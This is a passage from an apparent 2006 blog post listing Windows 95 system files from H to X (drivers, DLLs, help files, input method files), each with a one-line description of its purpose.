HYPERTRM.HLP - "HyperTerminal" help
HZKBD.EXE - common input method program
HZVIO95.EXE - display driver

I.
I82593.DOS - network adapter driver
IB401917.SPD - printer driver
IBM20470.SPD - printer driver
IBM20K.DOS - network adapter driver
ICM32.DLL - image color matching program
ICMOI.DLL - user interface color matching program
ICONLIB.DLL - icon library
IEXPLORE.CNT - help index file (IE)
IEXPLORE.EXE - Internet Explorer
IEXPLORE.HLP - help file (IE)
IFSHLP.SYS - file system installation helper file
IFSMGR.VXD - file system installation manager
IMAGEOIT.EXE - image editor cursor program
IMCLIENT.DLL - Microsoft Network component
IME.CNT - help index file (Chinese input method)
IME.HLP - Windows help file
IME.INF - setup information file (Chinese input method)
IMEGEN.CNF - help index file (input method generator)
IMEGEN.EXE - input method generator
IMEGEN.HLP - help file (input method generator)
IMEINFO.INI - input method initialization file
IMM32.DLL - WIN32 IMM application interface
INBOX.EXC - mail component
INDICDLL.DLL - multi-language component
INET.TXT - IE readme file
INET16.DLL - dynamic link library (IE 2.0 support)
INETAB32.DLL - dynamic link library (Internet mail support)
INETCFG.DLL - dynamic link library (IE 2.0 support)
INETCPL.CPL - control panel file (configures IE 2.0)
INETMAIL.INF - setup information file (Internet mail)
INETWIZ.EXE - Internet Setup Wizard
INformS.WPF - template file
INSTBE.BAT - Microsoft Network component
INSTDICT.EXE - MSDOS command (input method installer)
INTB.VXD - interrupt 13 virtual device
INTL.CPL - control panel
INT-MAIL.CNT - help index file (Internet mail)
IOS.INI - lists programs that need safety protection
IOSCLASS.DLL - CDROM installer
IRMATR.DOS - network adapter driver
ISAPNP.VXD - ISA bus Plug and Play program

J.
JOY.CPL - joystick control panel
JOYSTICK.INF - multimedia setup information
JP350.DRV - printer driver
JUNGLE~1.WAV - sound file

K.
KBDBE.KBD - Belgian keyboard layout
KBDBR.KBD - Brazilian keyboard layout
KBDCA.KBD - French and Canadian keyboard layout
KBDOS.KBD - US keyboard layout
KDCOLOR1.SPD - printer driver
KERNEL32.DLL - 32-bit kernel
KEYB.COM - loads the keyboard control program into memory
KODAKCE.ICM - Kodak ICC profile
KRNL386.EXE - Core application

L.
LABEL.EXE - DOS command, sets the disk label
LFNBK.EXE - long filename backup file
LFNBK.TXT - LFNBK readme file
LICENSE.HLP - Windows help file
LMSCRIPT.EXE - LAN Manager script processor
LOGIN.EXE - Win95 NetWare login file
LQ1600K.EXE - LQ1600K printer driver

M.
MAILMSG.DLL - Microsoft Network component
MAILOPT.INF - MAIL/MAPI setup file
MAPI.DLL - Mail/Exchange component
MCIAVI.DRV - multimedia driver
MCICDA.DRV - MCI CD audio driver
MCIOLE.DLL - MCI OLE handle
MCIPIONR.DRV - MCI optical disc driver
MCISEQ.DRV - MCI sequencer driver
MCIVISCA.DRV - MCI VCR driver
MCIWAVE.DRV - MCI Wave driver
MDMNOKIA.INF - setup information file (modem)
MDMNOVA.INF - setup information file (modem)
MDMVV.INF - setup information file (modem)
MEMMAKER.EXE - memory manager
MEMMAKER.INF - memory manager setup information
MFCUIA32.DLL - OLE common dialog dynamic link library
MIDI.INF - Plug and Play MIDI device information
MINET32.DLL - Internet Mail support dynamic link library
MKECR5XX.MPD - SCSI driver
ML3XEC16.EXE - application (MAPI)
MLSHEXT.DLL - Microsoft kernel extension library
MMCI.DLL - media class installer
MMDEVLDR.VXD - Plug and Play device loader
MMDRV.HLP - multimedia help file
MMSOUND.DRV - multimedia driver
MMSYSTEM.DLL - multimedia system kernel
MMTASK.TSK - multimedia background task switcher
MODE.COM - DOS command
MODERN.FON - font file (modern)
MORE.COM - DOS command
MOUSE.DRV - mouse driver
MOVEWIN.AVI - video clip (how to move a window)
MPLAYER.EXE - Media Player
MPR.DLL - WIN32 network interface dynamic link library
MSAB32.DLL - Microsoft Network address book
MSBASE.INF - setup information
MSCDEX.EXE - DOS MSCDEX CDROM extension tool
MSCDROM.INF - class installation setup information
MSD.EXE - Microsoft Diagnostics tool
MSD.INI - Microsoft Diagnostics initialization
MSDET.INF - system detection setup information
MSDISP.INF - display setup information
MSDLG.EXE - Data Link Control protocol
MSDOS.INF - setup information
MSDOSDRV.TXT - device driver readme file
MSFT.VRL - uniform resource locator file
MSGSRV32.EXE - Windows 32-bit virtual device message system
MSHDC.INF - hard disk controller setup information
MSJSTICK.DRV - Plug and Play joystick driver
MSMAIL.INF - Mail/MAPI initialization
MSMOUSE.INF - mouse setup information
MSN.TXT - Microsoft Network readme file
MSNET32.DLL - Microsoft 32-bit network API library
MSNEXCH.EXE - Microsoft Network setup program
MSNPSS.HLP - Microsoft Network help file
MSNVER.TXT - Microsoft Network help information
MSPAINT.EXE - Paint tool
MSPCIC.DLL - PCMCIA class installation and control tool
MSPORTS.INF - common setup information
MSPP32.DLL - Microsoft Network print support program
MSPWL32.DLL - password list management library
MSSBLST.DRV - Sound Blaster card driver
MSSBLSI.VXD - Sound Blaster card driver
MSSHRVI.DLL - sharing kernel extension program
MSSNDSYS.DRV - Windows Sound System driver
MSSP.VXP - Windows NT security support
MSTCP.DLL - TCP user interface
MSVIEWUT.DLL - display device service data link library
MTMMINIP.MPD - SCSI driver
MULLANG.INF - multi-language font support setup information
MVIWAVE.DRV - sound driver

N.
NBTSTAT.EXE - TCP tool
NDDEAPI.DLL - Workgroups DDE sharing interface
NDDENB.DLL - Microsoft Network DDE NetBIOS interface
NDISHLP.SYS - real-mode NDIS support driver
NET.EXE - real-mode network client software
NET.INF - network detection information
NET.MSG - network client messages
NET3COM.INF - network setup information
NETAMD.INF - network setup information
NETAPI.DLL - network application programming interface dynamic link library
NETAPI32.DLL - 32-bit network API dynamic link library
NETAVXT.INF - MS internal transfer file
NETBEUI.VXD - 32-bit NetBEUI protocol
NETBIOS.DLL - NetBIOS API library
NETDCA.INF - setup information file
NETDDE.EXE - Windows network dynamic data exchange
NETDET.INI - NetWare detection file
NETDI.DLL - network device installation
NETH.MSG - network client help messages
NETOS.DLL - NOS detection DLL
NETWATCH.EXE - Net Watcher program
NETWORK.TXT - network information readme file
NOTEPAD.EXE - Notepad application
NODRIVER.INF - Plug and Play device information
NOTEPAD.EXE - NOTEPAD file
NSCL.VXD - NSCL virtual device
NW16.DLL - NetWare client
NWAB32.DLL - address book support dynamic link library
NWLSCON.EXE - login script console program
NWLSPROC.EXE - NetWare login processor
NWNET32.DLL - NetWare client
NWNP32.DLL - NetWare component
NWREDIR.VXD - NetWare redirector
NWSERVER.VXD - NCP service
NWSP.VXD - NCP service security provider

O.
OEMREVA.INF - setup information file
OLE2.DLL - OLE 2.0 dynamic link library
OLE2.INF - OLE setup information
OLE32.DLL - 32-bit OLE 2.0 component
OLEAUT32.DLL - OLE2-32 automation
OLECL1.DLL - object linking and embedding client library
OLEDLG.DLL - Windows OLE 2.0 user interface support
OLESVR.DLL - object linking and embedding server library
OLETHK32.DLL - OLE thunk library

P.
PACKAGER.EXE - Object Packager
PARALINK.VXD - remote network access parallel port driver
PBRVSH.EXE - "Paint" application
PDOS95.BAT - enters Chinese DOS mode
PERF.VXD - system performance monitor
PIFMGR.DLL - program information file manager service
PING.EXE - TCP Ping tool
PMSPL.DLL - LAN Manager application programming interface
POWER.DRV - Advanced Power Management driver
PPPMAC.VXD - Windows virtual PPP driver
PRINT.EXE - DOS print file
PRINTERS.TXT - printing information readme file
PROGMAN.EXE - Program Manager
PRTVPD.INF - printer upgrade setup information

Q.
QUIKVIEW.EXE - Quick View
QUIT.EXE - exits Chinese DOS mode

R.
README.TXT - Windows 95 readme file
REGEDIT.EXE - Registry Editor
REGSERV.EXE - remote registry
REGWIE.EXE - registration tool
REGSERV.INF - remote registry
RESTORE.EXE - DOS command
RNAAPP.EXE - Dial-Up Networking application
RNASERV.DLL - remote network access service
RNASETUP.DLL - remote network access setup dynamic link library
RNATHUNK.DLL - remote network access thunk support dynamic link library
RNAUI.DLL - remote network access user interface DLL
RNDSRV32.DLL - replication service program
ROBOTZCL.WAV - sound file
ROBOTZWI.WAV - sound file
ROMAN.FON - font file
ROUTE.EXE - TCP/IP ROUTE command
RPCLTC1.DLL - remote procedure call library
RPCNS4.DLL - remote procedure call library
RPCPP.DLL - remote procedure call print driver
RPCRT4.DLL - remote procedure call library
RPCSS.EXE - remote procedure call node mapper
RPLBOOT.SYS - remote program load
RPLIMAGE.DLL - remote program load disk imager
RSRC16.DLL - Resource Meter
RSRCMTR.EXE - Resource Meter
RSRCMTR.INF - Resource Meter
RUMOR.EXE - DDE test/game
RUNDLL.EXE - runs a DLL as an application
RUNDLL32.EXE - 32-bit shell component

S.
S3.DRV - S3 display driver
S3.VXD - S3 virtual device
SACLIEN.DLL - Microsoft Network component
SAMPLEVIDEOS - image files
SAPNSP.DLL - Winsock data connection library
SAVE32.COM - TSR file needed during setup
SB16.VXD - 16-bit sound card virtual device
SB16SND.DRV - 16-bit sound card driver
SBAWE.VXD - AWE sound card virtual device
SBAWE32.DRV - AWE sound card driver
SBFM.DRV - 16-bit sound card driver
SCANDISK.BAT - replacement stub module for the MSDOS 6.x Scandisk; disk diagnostic tool
SCANDISK.INI - disk diagnostic tool
SCANDISK.PIF - PIF file used when installing the disk diagnostic tool
SCANDSKW.EXE - disk scanning tool
SCANPROG.EXE - disk scanning tool
SCRNSAVE.SCR - screen saver
SCSI.INF - SCSI installation file (file name description)
SCSIIHLP.VXD - SCSI support file
SCSIPORT.PDR - SCSI virtual device port
SECUR32.DLL - Microsoft Win32 security services
SECURCL.DLL - Microsoft Network component
SEIKO24E.DRV - printer driver
SEIKOSH9.DRV - printer driver
SERIAL.VXD - serial port VCOMM driver
SERIFE.FON - font file
SERVER.HLP - server help file
SETMDIR.EXE - SBS file
SETUP.BIN - setup support file
SETUP.BMP - setup wash bitmap file
SETUP.EXE - Windows 95 setup program
SETUP.INF - setup information file
SETUP.TXT - README file for setup
SETUP4.DLL - setup support file
SETUPPP.INF - setup information
SETUPX.DLL - setup support
SETVER.EXE - MSDOS version display; this program can be run over the network
SF4029.EXE - printer driver
SHARE.EXE - MSDOS share utility
SHELL.INF - shell setup information
SHELL.VXD - virtual shell device
SHELL2.INF - color scheme
SHELL3.INF - color scheme
SIZE1-1.CUR - cursor
SIZE1-M.CUR - cursor
SIZE4-M.CUR - cursor
SIZENESW.ANI - animated cursor
SIZEWE.ANI - animated cursor
SKPSFA-1.SPD - printer driver
SLAN.DOS - network adapter driver
SLCD32.MPD - SCSI driver
SLENH.DLL - advanced power-saving options
SMALLE.FON - font file
SMALLF.FON - font file
SMARTDRV.EXE - high-speed disk cache program
SMARTND.DOS - network adapter driver
SMC3000.DOS - network adapter driver
SMC9000.VXD - network adapter driver
SNAPSHOT.EXE - snapshot
SNAPSHOT.VXD - snapshot virtual device
SNDREC32.EXE - Sound Recorder
SNIP.VXD - network adapter driver
SOCKET.VXD - Windows virtual socket network card driver; PCMCIA support
SOL.CNT - Solitaire card game
SOL.HLP - Solitaire card game help file
SORT.EXE - MSDOS sort utility
SOUNDREC.CNT - Sound Recorder help file contents
SOUNDREC.HLP - Sound Recorder help file
SPARROW.WPD - SCSI driver
SPARROWX.MPD - SCSI driver
SPOOL32.EXE - printer support
SPOOLER.VXD - printer sharing virtual device
SRAMMTD.VXD - PCMCIA support
SSERIFE.FON - font file
SSERIFF.FON - font file
SSFLYWIN.SCR - screen saver
SSSTARS.SCR - screen saver
STAR24E.DRV - printer driver
STAR9E.DRV - printer driver
START.EXE - start program
STATE.PBK - Microsoft Network component
STDOLE.TLB - OLE 2.0 file
STDOLE32.TLB - OLE2-32 file
STEMO409.DLL - DLL for the Windows 95 help file
STLSO4SS.SPD - printer driver
STLS577U.SPD - printer driver
STORAGE.DLL - OLE storage management library
STRN.DOS - network adapter driver
SUBST.EXE - MSDOS Subst utility
SUEXPAND.DLL - LZ DLL setup
SUHELPER.BIN - setup support
SUPERVGA.DRV - advanced VGA display driver
SURPORT.TXT - PSS support information
SVCPROP.DLL - Microsoft Network component
SVRAPI.DLL - 32-bit common server API utility
SXCIEXT.DLL - Matrox display driver support file
SYMBOLE.FON - font file
SYS.COM - MSDOS system utility
SYSCLASS.DLL - system class library installation
SYSDETMG.DLL - system detection library
SYSEDIT.EXE - System Editor
SYSLOGO.RLE - system logo
SYSMON.EXE - System Monitor
SYSMON.HLP - System Monitor help
SYSTEM.DRV - minimal Win 3.1 standard mode
SYSTHUNK.DLL - Windows system thunk library
SYSTRAY.EXE - advanced power-saving management

T.
T128.MPD - SCSI driver
T160.MPD - SCSI driver
T20N3.VXD - network adapter driver
T30ND.DOS - network adapter driver
T338.MPD - SCSI driver
TADA.WAV - sound file
TAPI.DLL - telephony API program
TAPI.INF - telephony API setup information file
TAPI32.DLL - 32-bit thunk
TAPIADDR.DLL - telephony API program
TAPIEXE.EXE - telephony API component
TAPIINI.EXE - telephony API component
TASKMAM.EXE - Task Manager
TCCARC.DOS - network adapter driver
TCTOKCH.VXD - network adapter driver
TELEPHON.CPL - telephony help
TESTPS.TXT - PostScript test
TEXTCHAT.EXE - Microsoft Network component
THEMIC-1.WAV - sound file
THINKJET.DRV - printer driver
THREED.VBX - Windows 95 browse
T1850.DRV - printer driver
TIMEDATE.CPL - time/date control panel
TIMES.TTF - Times font
TIMESBD.TTF - Times bold font
TIMESBI.TTF - Times bold italic font
TIMESI.TTF - Times italic font
TIMEZONE.INF - setup information
TIMLP232.SPD - printer driver
TIPS.txt - tips and tricks readme file
TKPHZR32.SPD - printer driver
TLNK.DOS - network adapter driver
TLNK3.VXD - network adapter driver
TMV1.MPD - SCSI driver
TOOLHELP.DLL - 16-bit development tool helper
TOSHIBA.DRV - printer driver
TOUR.EXE - browse file
TPHAIII.ICM - printer profile
TRACERT.EXE - TCP/IP TRACEROUTE command
TREE.COM - MS DOS tree utility
TREEEDCL.DLL - Microsoft Network component
TREENVCL.DLL - Microsoft Network component
TRIUMPHI.SPD - printer driver
TSD32.DLL - audio compression manager
TSENG.DRV - ET4000W32 display driver
TTY.DRV - printer driver
TTY.HLP - TTY printer driver help
TYPELIB.DLL - OLE 2.0

U.
U9415470.SPD - printer driver
UBNEI.DOS - network adapter driver
ULTRA124.MPD - SCSI driver
ULTRA24F.MPD - SCSI driver
UMDM16.DLL - universal modem driver component
UMDM32.DLL - universal modem driver component
UNIDRV.DLL - Microsoft universal printer driver library
UNIDRV.HLP - universal printer driver help
UNIMODEM.VXD - universal modem driver
USER32.DLL - 32-bit user

V.
V86MMGR.VXD - V86MMGR virtual device
VCACHE.VXD - VCache virtual device
VCD.VXD - virtual COM driver
VCOMM.VXD - VCOMM driver
VCOND.VXD - Win32 console
VDMAD.VXD - VDMAD virtual device
VER.DLL - 16-bit dynamic link library for the small Win 3.1 installer
VER.NEW - version detection and file installation library
VERSION.DLL - 32-bit version dynamic link library
VERX.DLL - version dynamic library used by the installer
VFAT.VXD - VFAT file system
VFD.VXD - floppy disk virtual device
VFLATD.VXD - virtual flat frame buffer virtual device
VGA.DRV - VGA display driver
VIDCAP.INF - Plug and Play VCD information
VIDEOT.VXD - video virtual device
VIP.386 - TCP/IP virtual IP device
VJOYD.VXD - joystick virtual device
VKD.VXD - virtual keyboard device
VLB32.DLL - Mail/Exchange component
VMD.VXD - Win 3.1 virtual mouse driver
VMM.VXD - virtual memory manager device
VMM32.VXD - virtual memory manager device
VMOUSE.VXD - virtual mouse driver
VNBT.386 - NetBIOS transport driver
VNETBIOS.VXD - VNETBIOS virtual device
VNETSUP.VXD - network support virtual device
VPD.VXD - virtual LPT driver
VPICD.VXD - virtual programmable interrupt controller device
VPOWERD.VXD - Advanced Power Management virtual device
VREDIR.VXD - Microsoft Network 32-bit client program
VSAMI.DLL - AMI file parser
VSASC8.DLL - ASCII file parser
VSBMP.DLL - BMP file parser
VSERVER.VXD - Microsoft Network 32-bit server-side program
VSGIF.DLL - GIF file parser
VSHARE.VXD - 32-bit sharing virtual device driver
VSMSW.DLL - Windows Write file parser
VSPP.DLL - PowerPoint parser
VSRTF.DLL - RTF file parser
VSTIFF.DLL - TIFF file parser
VSW6.DLL - Word 6 file parser
VSWORD.DLL - Word file parser
VSWP5.DLL - WordPerfect 5 file parser
VSXL5.DLL - Excel file/chart parser
VTCP.386 - TCP/IP virtual TCP driver
VTDAPI.VXD - VTDAPI virtual device
VTDI.386 - transport driver interface support program
VXDLDR.VXD - virtual device driver loader

W.
WAVE.INF - Plug and Play wave device information
WDTOOOEX.MPD - SCSI driver
WGPOADMN.DLL - Mail/Exchange component
WHLP16T.DLL - help dynamic link library
WIN87EM.DLL - 80387 math emulation library
WINABC.HLP - Intelligent ABC input method help file
WINBX.HLP - Biaoxing code input method help file
WINCHA.HLP - Traditional Chinese Cangjie input method help file
WINDOWS.CNT - Windows 95 help file contents
WINDOWS.HLP - Windows 95 help file
WINFILE.CNT - File Manager help file contents
WINFILE.EXE - Windows for Workgroups File Manager
WINFILE.HLP - File Manager help file
WINGB.HLP - Quwei code input method help file
WINHLP23.HLP - Windows help file
WINIME.HLP - operation guide help file
WINNM.HLP - GBK internal code input method help file
WININIT.EXE - Windows initialization file
WINIPCFG.EXE - TCP/IP configuration tool
WINNEWS.TXT - Winnews information
WINPHO.HLP - Traditional Chinese Zhuyin input method help file
WINPOPUP.EXE - POPUP tool
WINREG.DLL - remote registry support
WINPY.HLP - Full Pinyin input method help file
WINSOCK.DLL - Windows socket API
WINSY.HLP - Double Pinyin input method help file
WINXSP.HLP - GBK Double Pinyin input method help file
WINXZM.HLP - GBK Zhengma input method help
WINZM.HLP - Zhengma input method help file
WNASPI32.DLL - Windows 32-bit ASPI DLL
WPSUNI.DRV - fax driver
WPSUNIRE.DLL - WPS host resource executable

X.
XCOPY.EXE - DOS XCOPY tool
XCOPY32.EXE - file copy program
XGA.DRV - XGA display driver

Asp 2006-10-01 18:25 Post a comment
]]>